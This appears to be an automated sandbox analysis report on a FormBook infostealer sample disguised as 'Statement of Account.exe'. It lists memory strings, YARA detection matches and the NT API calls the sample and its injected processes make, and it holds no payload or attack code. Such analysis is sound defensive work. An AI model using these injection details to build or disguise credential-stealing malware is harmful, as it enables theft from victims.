          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000007.00000002.4174329617.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: vbc.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 4608, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 7108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A320 NtCreateFile,6_2_0041A320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A3D0 NtReadFile,6_2_0041A3D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A450 NtClose,6_2_0041A450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A500 NtAllocateVirtualMemory,6_2_0041A500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A31B NtCreateFile,6_2_0041A31B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A44A NtClose,6_2_0041A44A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041A4FA NtAllocateVirtualMemory,6_2_0041A4FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82DD0 NtDelayExecution,LdrInitializeThunk,6_2_05C82DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05C82DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05C82D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05C82D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05C82CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05C82C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82FE0 NtCreateFile,LdrInitializeThunk,6_2_05C82FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82F90 NtProtectVirtualMemory,LdrInitializeThunk,6_2_05C82F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82FB0 NtResumeThread,LdrInitializeThunk,6_2_05C82FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82F30 NtCreateSection,LdrInitializeThunk,6_2_05C82F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_05C82E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_05C82EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05C82BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82B60 NtClose,LdrInitializeThunk,6_2_05C82B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82AD0 NtReadFile,LdrInitializeThunk,6_2_05C82AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C84650 NtSuspendThread,6_2_05C84650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C84340 NtSetContextThread,6_2_05C84340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82DB0 NtEnumerateKey,6_2_05C82DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82D00 NtSetInformationFile,6_2_05C82D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82CC0 NtQueryVirtualMemory,6_2_05C82CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82CF0 NtOpenProcess,6_2_05C82CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82C60 NtCreateKey,6_2_05C82C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82C00 NtQueryInformationProcess,6_2_05C82C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82FA0 NtQuerySection,6_2_05C82FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82F60 NtCreateProcessEx,6_2_05C82F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82EE0 NtQueueApcThread,6_2_05C82EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82E30 NtWriteVirtualMemory,6_2_05C82E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82BE0 NtQueryValueKey,6_2_05C82BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82B80 NtQueryInformationFile,6_2_05C82B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82BA0 NtEnumerateValueKey,6_2_05C82BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82AF0 NtWriteFile,6_2_05C82AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82AB0 NtWaitForSingleObject,6_2_05C82AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C835C0 NtCreateMutant,6_2_05C835C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C83090 NtSetValueKey,6_2_05C83090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C83010 NtOpenDirectoryObject,6_2_05C83010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C83D70 NtOpenThread,6_2_05C83D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C83D10 NtOpenProcessToken,6_2_05C83D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C839B0 NtGetContextThread,6_2_05C839B0
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F0232 NtCreateFile,7_2_0E7F0232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F1E12 NtProtectVirtualMemory,7_2_0E7F1E12
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F1E0A NtProtectVirtualMemory,7_2_0E7F1E0A
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_013FD3840_2_013FD384
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07810E880_2_07810E88
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07810E780_2_07810E78
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A31EE80_2_07A31EE8
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A345200_2_07A34520
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A323200_2_07A32320
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A33B200_2_07A33B20
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A31AB00_2_07A31AB0
          Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 0_2_07A3A8580_2_07A3A858
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041ED756_2_0041ED75
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00409E4C6_2_00409E4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00409E506_2_00409E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041EE8A6_2_0041EE8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041D7726_2_0041D772
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0041E77C6_2_0041E77C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D105916_2_05D10591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C505356_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFE4F66_2_05CFE4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D024466_2_05D02446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF44206_2_05CF4420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4C7C06_2_05C4C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C747506_2_05C74750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C507706_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6C6E06_2_05C6C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D081CC6_2_05D081CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D041A26_2_05D041A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D101AA6_2_05D101AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD81586_2_05CD8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C401006_2_05C40100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEA1186_2_05CEA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE20006_2_05CE2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5E3F06_2_05C5E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D103E66_2_05D103E6
